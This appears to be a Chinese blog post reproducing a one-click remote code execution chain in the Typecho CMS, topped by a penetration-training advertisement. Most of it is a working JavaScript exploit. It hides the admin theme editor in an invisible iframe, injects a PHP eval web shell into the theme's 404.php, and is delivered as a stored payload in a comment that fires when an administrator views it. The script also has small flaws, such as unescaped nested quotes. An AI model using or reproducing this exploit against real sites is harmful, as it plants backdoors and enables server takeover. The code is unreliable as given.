Typecho(最新1clickRCE复现)
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
ZAC安全
#2023#
然后准备好ZAC.JS文件,作为exp
function step1(){
var data2="<iframe id="testxss" src="http://localhost/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>";
var oldata=document.body.innerHTML;
document.body.innerHTML=(oldata+data2);}
var times=0;
var g_shell=0;
function poc(){
if(times<=10){
var htmldata=document.getElementById('testxss').contentWindow.document.getElementById('content');
var btn=document.getElementById('testxss').contentWindow.document.getElementsByTagName('button');
htmldata.innerText=('<?php eval($_POST[1]);');
btn[1].click();
times+=1;
if(g_shell==1){
var xhr1=new XMLHttpRequest();
xhr1.open('get','/usr/themes/default/404.php?shell=1');
xhr1.send();
}
else{
return 0;
}
}
}
step1();
搭建好环境
然后打开文章,进入到评论区
抓包并添加poc
然后此时上管理员账号进入后台,访问评论页面,可以看到我们已经成功的插入payload,此时就已经把马子写入到404.php了
其中rce我们访问的文件是 admin/theme-editor.php
后端处理逻辑在var/Widget/Themes/Edit.php文件中
使用fwrite写入我们传的参数
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/8313.html